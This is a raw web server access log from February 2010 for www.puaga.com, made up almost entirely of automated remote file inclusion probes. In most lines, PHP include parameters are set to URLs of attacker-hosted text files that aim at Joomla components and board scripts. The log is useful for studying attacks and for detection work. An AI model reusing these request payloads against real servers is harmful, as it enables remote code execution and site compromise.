222.237.78.176 - - [20/Feb/2010:08:21:46 -0800] "GET /?path%5Bdocroot%5D=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [20/Feb/2010:08:21:48 -0800] "GET /logs/access_100126.log%20%20//?path%5Bdocroot%5D=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:08:22:08 -0800] "GET //bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:08:22:08 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:08:22:08 -0800] "GET /logs/access_100206.log%20%20///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:08:22:28 -0800] "GET //bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:08:22:28 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:08:22:29 -0800] "GET /logs/access_100206.log%20%20///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:23:26 -0800] "GET /phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:23:26 -0800] "GET /logs/access_100115.log%20%20/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:23:26 -0800] "GET /logs/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:08:24:04 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:08:24:04 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:08:24:05 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
92.243.17.60 - - [20/Feb/2010:08:24:37 -0800] "GET /logs/access_100120.log/main.php?http://80.59.61.12/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
92.243.17.60 - - [20/Feb/2010:08:24:38 -0800] "GET /main.php?http://80.59.61.12/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
92.243.17.60 - - [20/Feb/2010:08:24:38 -0800] "GET /logs/main.php?http://80.59.61.12/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
92.243.17.60 - - [20/Feb/2010:08:24:46 -0800] "GET /logs/access_100124.log/main.php?http://80.59.61.12/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
201.28.110.99 - - [20/Feb/2010:08:25:01 -0800] "GET /logs/access_100126.log/playing.php/common/db.php?commonpath=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:08:29:55 -0800] "GET /logs/access_100129.log//newspublish/include.php?path[docroot]=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:08:29:55 -0800] "GET /logs//newspublish/include.php?path[docroot]=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:08:29:55 -0800] "GET /newspublish/include.php?path[docroot]=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.153 - - [20/Feb/2010:08:29:55 -0800] "GET /logs/access_100114.log//newspublish/include.php?path[docroot]=http://80.59.61.12/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:31:18 -0800] "GET /logs/access_100206.log///bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:31:18 -0800] "GET //bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:31:18 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:08:31:52 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.45.90.196 - - [20/Feb/2010:08:34:58 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.45.90.196 - - [20/Feb/2010:08:34:59 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.45.90.196 - - [20/Feb/2010:08:34:59 -0800] "GET /logs/access_100121.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:08:36:17 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_all.php?board_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:37:05 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:37:05 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:37:27 -0800] "GET /logs/access_100114.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:37:31 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:37:31 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:37:57 -0800] "GET /logs/access_100114.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:38:02 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:38:02 -0800] "GET /logs/access_100125.log//bbs/delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:38:02 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.45.90.196 - - [20/Feb/2010:08:38:03 -0800] "GET /logs/access_100121.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:38:06 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:38:06 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:38:06 -0800] "GET /logs/access_100125.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:38:23 -0800] "GET /logs/access_100120.log//bbs/delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:39:01 -0800] "GET /logs/access_100202.log///bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:08:39:11 -0800] "GET /logs/Gallery/displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:08:39:12 -0800] "GET /logs/Gallery/displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:08:39:12 -0800] "GET /logs/access_100210.log%20%20/Gallery/displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:08:39:13 -0800] "GET /logs/access_100210.log%20%20/Gallery/displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:08:39:17 -0800] "GET /Gallery/displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:39:39 -0800] "GET /logs/access_100120.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.45.90.196 - - [20/Feb/2010:08:39:42 -0800] "GET /logs/access.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:39:48 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:39:48 -0800] "GET /logs/access_100114.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:39:48 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [20/Feb/2010:08:40:12 -0800] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [20/Feb/2010:08:40:12 -0800] "GET /logs/access_100208.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [20/Feb/2010:08:40:13 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [20/Feb/2010:08:40:57 -0800] "GET /logs/access_100107.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [20/Feb/2010:08:40:57 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [20/Feb/2010:08:40:57 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.azovcable.ru/backup/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.92.26 - - [20/Feb/2010:08:41:22 -0800] "GET /logs/access_100206.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.92.26 - - [20/Feb/2010:08:41:22 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.92.26 - - [20/Feb/2010:08:41:23 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
173.45.90.196 - - [20/Feb/2010:08:42:31 -0800] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.45.90.196 - - [20/Feb/2010:08:42:31 -0800] "GET /logs//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.45.90.196 - - [20/Feb/2010:08:42:31 -0800] "GET /logs/access_090813.log//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:42:34 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:42:34 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:42:34 -0800] "GET /logs/access_100206.log///bbs/delete_all.php?board_skin_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:08:43:04 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:08:43:04 -0800] "GET /logs/access_100208.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:08:43:04 -0800] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:08:43:14 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_all.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:44:29 -0800] "GET //bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:44:29 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:44:29 -0800] "GET /logs/access_100206.log%20%20///bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:45:13 -0800] "GET /logs/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:45:13 -0800] "GET /logs/access_100123.log%20%20/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:45:13 -0800] "GET /ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:45:14 -0800] "GET /logs/access_100123.log%20%20/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:45:14 -0800] "GET /logs/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:45:14 -0800] "GET /ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:45:25 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:45:25 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:45:42 -0800] "GET /logs/access_100115.log%20%20/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:45:42 -0800] "GET /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:45:42 -0800] "GET /logs/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [20/Feb/2010:08:46:28 -0800] "GET /logs/access_100210.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:46:38 -0800] "GET /bbs/delete.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:46:38 -0800] "GET /logs//bbs/delete.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:46:38 -0800] "GET /logs/access_100125.log%20%20//bbs/delete.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:46:40 -0800] "GET /logs/access_100123.log/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:46:40 -0800] "GET /logs/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:46:40 -0800] "GET /ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [20/Feb/2010:08:46:41 -0800] "GET /bbs/delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:46:44 -0800] "GET /logs/access_100123.log/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:46:44 -0800] "GET /ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:46:44 -0800] "GET /logs/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:46:54 -0800] "GET /logs/access_100114.log/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [20/Feb/2010:08:47:00 -0800] "GET /logs/access_100114.log/ashnews.php?pathtoashnews=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:47:09 -0800] "GET /logs/access_100202.log///bbs/delete_all.php?board_skin_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.171.180.4 - - [20/Feb/2010:08:47:55 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.puaga.com"
88.171.180.4 - - [20/Feb/2010:08:47:55 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.puaga.com"
88.171.180.4 - - [20/Feb/2010:08:47:57 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
88.171.180.4 - - [20/Feb/2010:08:47:59 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:48:13 -0800] "GET /logs/access_100120.log%20%20//bbs/delete.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:49:03 -0800] "GET /logs/access_100206.log///bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:49:03 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:49:03 -0800] "GET //bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [20/Feb/2010:08:49:59 -0800] "GET /logs/access_100206.log/bbs/delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
210.127.209.105 - - [20/Feb/2010:08:49:59 -0800] "GET /logs/bbs/delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:51:11 -0800] "GET /logs/access_100115.log%20%20/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:51:11 -0800] "GET /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
